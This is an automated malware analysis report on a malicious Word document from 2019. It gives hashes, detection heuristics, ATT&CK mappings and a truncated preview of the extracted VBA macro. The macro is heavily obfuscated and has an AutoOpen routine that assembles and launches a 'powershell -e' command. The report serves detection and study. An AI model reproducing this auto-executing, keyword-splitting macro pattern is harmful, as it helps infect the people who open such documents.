Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d2005ac2c423a81d…

MALICIOUS

Office (OLE)

199.1 KB Created: 2019-03-13 16:28:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 433776e93c299b57f98b8362c42bd112 SHA-1: 67befad5932143dae949de09096f3dd1ea007e4b SHA-256: d2005ac2c423a81d101e6ffc535e593b47c55aca7ee52aef03c591504e24bcfc
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros with an AutoOpen function, indicating an attempt to automatically execute malicious code upon opening. Heuristics indicate obfuscation techniques and the use of GetObject to execute code, likely to download and run a second-stage payload. The reassembled token 'Win32_Process' suggests the macro attempts to interact with system processes.

Heuristics 8

  • ClamAV: Doc.Malware.00536d-6895331-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6895331-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40124 bytes
SHA-256: 1b08abd0fda58ba8d5f6d838f3853f115f3559eb3ef48a12eae256707229ff27
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "IxABADcA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function WBcAQX()
   If ZAA4XGBc = CQZACkA Then
tCABAAA = CVar(BAwQAwC1)
lABGQGAD = v1XoUUc + CInt(aUADocx) * 376145393 * CBool(510172313) + 269236638 / Round(iBkcZA1o) - bXGQA4D + Sqr(836029335) - 544699844 * CByte(227624417)
pkcQCUQ1 = CInt(wAA_DA)
End If
   If lUAAkw = XDAAQAC_ Then
w4A_AAU = CVar(BQQCAwU)
cA1kCGAA = YAAABQc + CInt(Ow1DQoA) * 167860640 * CBool(663326753) + 138245169 / Round(IAcAQkAA) - vQAkQDDw + Sqr(386077413) - 944435466 * CByte(734936888)
mAAQwXZD = CInt(sAUGQQA)
End If
   If hUAQ4co = sZ1BAD Then
OAX4ADA = CVar(rZQA1_)
MADAw_1U = X_AAcDB + CInt(hoxAA4Ak) * 370009253 * CBool(28595676) + 895682958 / Round(WAAB_A) - vAABBGAB + Sqr(529203338) - 196463654 * CByte(320675936)
KCw4xUQ = CInt(iUCUAxDk)
End If
   If scAAUAZ = iAAZAA Then
oUUGB_ZC = CVar(LQBAQZ)
oDA1AxcQ = jAUBGxZ + CInt(mxZAA1) * 425810290 * CBool(264318893) + 266007088 / Round(pC4QAoA) - jUAAx1DB + Sqr(662450236) - 876384753 * CByte(809366796)
QAC1AA = CInt(nUDQGG)
End If
   If so_CBDZA = tD_1AAAB Then
iUUQCQG = CVar(M4A_DwC)
MAADZBBA = jc1XcA + CInt(IUcAUQ1) * 799183729 * CBool(265736682) + 839872953 / Round(DBBA41) - uAAUAA + Sqr(42187556) - 463188169 * CByte(948233883)
PwQQZA = CInt(zAU1xD4)
End If
   If NDUABww = WDxUoo Then
cA4XBc = CVar(b_GUcA)
tXDAZ_ = GQUAAAAU + CInt(vABXUDoA) * 312203550 * CBool(771823981) + 556638519 / Round(FUCBUZ) - DABAQ1XQ + Sqr(482776729) - 403915218 * CByte(952674628)
WwZG_A = CInt(IBXoZ4)
End If
   If iAQxAAAB = uA1DQZ Then
V4_A14 = CVar(p4xDAA4)
UBGD1B = iB4DQAAU + CInt(IA4ZAAAA) * 829831994 * CBool(576642899) + 988508739 / Round(PBxkCZ) - BAAUQD + Sqr(161176138) - 315299 * CByte(861027410)
DBA_AoU = CInt(CAAAB41)
End If
   If vADAkC = vxAcGAA Then
QBUADAA = CVar(pZABAAAc)
UAAAAUG = co1DAQAA + CInt(rkUUAAwA) * 337848824 * CBool(702767019) + 26288099 / Round(TQA1UAAC) - uDAZAAA + Sqr(165146029) - 286217169 * CByte(736223140)
MGBZAkkA = CInt(RXA4U_AU)
End If
End Function
Sub autoopen()
On Error Resume Next
   If pkAQA_G = nDGAAAA Then
dcBoAAA = CVar(jQCXABoo)
QAGACcC = uC4GA1 + CInt(tCCD4B4x) * 225652868 * CBool(454847503) + 560600718 / Round(OoAXDB) - jowQA4C + Sqr(93175180) - 844047926 * CByte(511010208)
hxCCQU = CInt(WUQUoX)
End If
   If rC4UwAAo = MAcxQAQ Then
BwGGAU4 = CVar(GDGAUwZw)
CAADkA = b1A_A4B + CInt(I1_1AQc) * 760843629 * CBool(789258766) + 913044794 / Round(oQQA_D) - sBQAQDAA + Sqr(644313519) - 43515168 * CByte(62628609)
kACDQAG = CInt(QwAQAQ1)
End If
dcwwUXAX (o1A4QAZ + "po" + DkABABD + "wersh" + CGGUGAw + "ell -e " + R_A4_B + mXBAoA + ZXcQoDw + sCCA1Z + CABQAGB)
   If OD1AGA1Z = IAAUBU Then
IZAAQXG = CVar(kcUDDA)
pDAxUAD = X4cAkDAA + CInt(CBBkc1) * 76033567 * CBool(588339140) + 534018374 / Round(EkoAQA1Q) - qABAADAB + Sqr(874865047) - 338221182 * CByte(928532883)
mAwwGUAA = CInt(lDZkAA)
End If
   If jQcA4xDG = qAAAAA4A Then
zBADUAc_ = CVar(XAA_oA)
vBDA_AD = zXDXAwAA + CInt(joXAAUXA) * 177073780 * CBool(743505443) + 253645357 / Round(FCkAQBD_) - YxAAkU + Sqr(418755993) - 183240419 * CByte(658297488)
vQAQ_A = CInt(vDUUXwA4)
End If
End Sub
Function Y1DBUxAZ()
   If VDACcAC = JABXwAA Then
hQBAQAXD = CVar(FU1_AAA)
zDUXAk = cBQZ1G + CInt(VGQAkA) * 914102323 * CBool(75904692) + 349616865 / Round(uDQU__) - RA4CZAAA + Sqr(512083877) - 799079151 * CByte(98523408)
X1AACDDX = CInt(qGC4UA)
End If
   If oAA14cAA = SwAQXA4 Then
RABAUZBA = CVar(F_U1AU)
cAUAxco = zAUABGCA + CInt(GAQQAoU4) * 922684687 * CBool(975250208) + 954091159 / Round(BoAX14) - vDABAQwA + Sqr(808468809) - 450687932 * CByte(17541246)
CQQQAo4U = CInt(uDXUAQZ)
End If
   If tAAD4AD = wGBBAUB Then
HUGxACQ = CVar(JAAQxQ)
IACABxA = F4wAkUQA + CInt(pB4cAw) * 182609338 * CBool(192328685) + 579762570 / Round(iAADQAA) - iABkBAA + Sqr(34526973) - 60465176 * CByte(420659956)
nUwBBA = CInt(TBGAZ_1
... (truncated)